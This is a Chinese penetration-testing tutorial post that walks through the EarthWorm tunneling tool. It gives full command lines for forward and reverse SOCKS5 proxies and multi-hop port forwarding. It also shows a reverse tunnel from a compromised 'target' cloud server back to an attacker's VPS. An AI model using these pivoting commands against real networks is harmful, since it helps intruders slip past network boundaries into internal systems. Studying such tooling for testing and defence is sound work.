内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区


0x00 前言
当你在内网渗透,并且拿下一台机器的权限时,你是不是觉得已经算是一次完整的渗透了?
不来一次内网漫游,渗透是不完整的,哈哈。

内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区



本文给大家推荐一款内网穿透神器EarthWorm,(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。

内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区



它强在哪些方面呢?
1.可穿透复杂的内网环境。(这么说吧:我本地连着路由器开一个虚拟机,可以直接反弹到公网的云服务器上。)
2.以支持多平台间的转接通讯,Linux、Windows、MacOS、Arm-Linux均支持。
支持平台列表:(可跨平台反弹)

ew_for_Win.exe 适用各种Windows系统(X86指令集、X64指令集) Windows7、Windows XP
ew_for_Linux32 各常见Linux发行版 (X86 指令集 CPU) Ubuntu(X86)/BT5(X86)
ew_for_linux64 各常见Linux发行版 (X64 指令集 CPU) Ubuntu(X64)/Kali(X64)
ew_for_MacOSX64 MacOS系统发行版 (X64 指令集) 苹果PC电脑,苹果server
ew_for_Arm32 常见Arm-Linux系统 HTC New One(Arm-Android)/小米路由器(R1D)
ew_mipsel 常见Mips-Linux系统 (Mipsel指令集 CPU) 萤石硬盘录像机、小米mini路由器(R1CM)

内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区

3.png (44.43 KB, 下载次数: 14)

下载附件

保存到相册

2018-3-21 13:19 上传



0x01 使用方法

以下所有样例,如无特殊说明代理端口均为1080,服务均为SOCKSv5代理服务.
该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。
1.正向SOCKS v5服务器

[Shell] 纯文本查看 复制代码

$ ./ew -s ssocksd -l 1080

2. 反弹 SOCKS v5 服务器
这个操作具体分两步:
a) 先在一台具有公网 ip 的主机A上运行以下命令:

[Shell] 纯文本查看 复制代码

$ ./ew -s rcsocks -l 1080 -e 8888

b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口

[Shell] 纯文本查看 复制代码

$ ./ew -s rssocks -d 1.1.1.1 -e 8888

成功。
3. 多级级联
工具中自带的三条端口转发指令,它们的参数格式分别为:

[Shell] 纯文本查看 复制代码

1

2

3

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999

$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

通过这些端口转发指令可以将处于网络深层的基于TCP的服务转发至根前,比如 SOCKS v5。
首先提供两个“二级级联”本地SOCKS测试样例:
a) lcx_tran 的用法

[Shell] 纯文本查看 复制代码

1

2

$ ./ew -s ssocksd -l 9999

$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

b) lcx_listen、lcx_slave 的用法

[Shell] 纯文本查看 复制代码

1

2

3

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./ew -s ssocksd -l 9999

$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

再提供一个“三级级联”的本地SOCKS测试用例以供参考

[Shell] 纯文本查看 复制代码

1

2

3

4

$ ./ew -s rcsocks -l 1080 -e 8888

$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

$ ./ew -s lcx_listen -l 9999 -e 7777

$ ./ew -s rssocks -d 127.0.0.1 -e 7777

数据流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks

0x02 实战测试(分为本地测试和公网IP测试)
一般最常用的就是上面的第二条:反弹 SOCKS v5 服务器。
使用实例1:
目标机器:

[Shell] 纯文本查看 复制代码

ew.exe -s rssocks -d 2.2.2.2 -e 888

(2.2.2.2为想要反弹到的机器)
攻击机器:

[Shell] 纯文本查看 复制代码

ew.exe -s rcsocks -l 1008 -e 888

(监听888端口,转发到1008端口)
测试环境:
在这里我直接用我的本机Win10作为目标机器,将虚拟机Win7作为攻击机器。

本机Win10 ip:192.168.62.1
Win7 ip:192.168.62.128

内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区



内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区



首先攻击机器win7运行命令:

[Shell] 纯文本查看 复制代码

ew_for_Win.exe -s rcsocks -l 1008 -e 888

接收888端口的数据并转发到1008端口。

内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区



此时正在监听。
目标机器Win10运行命令:

[Shell] 纯文本查看 复制代码

ew_for_Win.exe -s rssocks -d 192.168.62.128 -e 888

内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区



此时攻击机器会弹出连接成功的提示:

内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区




好了,到此Win10的SOCKS5代理就反弹到Win7攻击机上了。
只需要一个Socks5连接工具就可以连接到本地1008端口来代理访问了。
推荐工具SocksCap64。

内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区




在代理处配置127.0.0.1:1008
代理已连接。
使用实例2:
攻击者洛杉矶 Linux VPS :45.78.*.*
目标阿里云服务器 Win2008:47.93.*.*
攻击者Linux监听:

[Shell] 纯文本查看 复制代码

[root@centos6 ~]# ./ew_for_Linux32 -s rcsocks -l 1008 -e 888

内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区



目标阿里云服务器反弹:

[Shell] 纯文本查看 复制代码

ew_for_Win.exe -s rssocks -d 45.78.*.* -e 888

内网穿透大杀器EarthWorm_白帽子技术/思路_i春秋社区



攻击机器监听出现:rssocks cmd_socket OK!
表示反弹成功。
0x03 工具下载
分别是EarthWorm和SocksCap64。

.keke_tieng{ border:1px solid #E3E3E3; background:#efefef; padding:5px;/* border-radius:10px; -moz-border-radius:10px; -webkit-border-radius:10px;*/ margin:15px auto; }
.keke_tieng .tienegbox{ background:#fff; padding:15px;/*border-radius:10px; -moz-border-radius:10px; -webkit-border-radius:10px;*/}
.keke_tieng .ngleft,.keke_tieng .ngright{ width:49%;}
.keke_tieng .ngleft{ float:left;}
.keke_tieng .ngright{ float:right}
.keke_tieng .hd{ width:100%; float:left; margin:0px 0px 10px 0px;height:28px;overflow:hidden;}
.keke_tieng .hd a{line-height:28px; height:28px;width:100%;margin-left:10px; font-size:16px;font-family:”Microsoft Yahei”; font-weight:bold}
.keke_tieng .hd h2{color:#FFF;width:62px;margin:0px;text-align:center;line-height:28px; height:28px; float:left}
.keke_tieng .ngleft .hd h2{background:url(source/plugin/keke_tieng/template/images/tbga.png) no-repeat right;}
.keke_tieng .ngright .hd h2{background:url(source/plugin/keke_tieng/template/images/tbgb.png) no-repeat right;}
.keke_tieng li{ width:100%; float:left; height:29px; overflow:hidden; line-height:29px; color:#fd6666;}
.keke_tieng li span{ float:right; width:50px; font-size:14px; color:#999; line-height:29px; text-align:right; padding-right:5px;}
.keke_tieng li a{height:29px; font-size:14px; font-family:”Microsoft Yahei”; line-height:29px;color:#333333}
.keke_tieng li a.bk{margin-right:3px; color:#FF9966}
.clear{ clear:both; }

.exx_zan {
width: 75px;
margin: 40px auto 0;
height: 75px;
position: relative;
clear: both;
}.exx_zan a.zan:link, .exx_zan a.zan:visited {
color: #fff;
text-decoration: none;
}.exx_zan a.zan {
width: 75px;
height: 75px;
background: url(https://bbs.ichunqiu.com/source/plugin/exx_like/template/images/dianzan.png) no-repeat 0 0;
display: block;
}.exx_zan a.zan:hover{
background: url(https://bbs.ichunqiu.com/source/plugin/exx_like/template/images/dianzan.png) no-repeat -95px 0;
}
.exx_zan a.zan em {
width: 75px;
text-align: center;
padding: 48px 0 0;
display: block;
color: #fff;
font-size:12px;
line-height:20px;
}

.pcb{margin-right:0}

原创文章,作者:254126420,如若转载,请注明出处:https://blog.ytso.com/244639.html

(0)
上一篇 2022年4月17日
下一篇 2022年4月17日

相关推荐

发表回复

登录后才能评论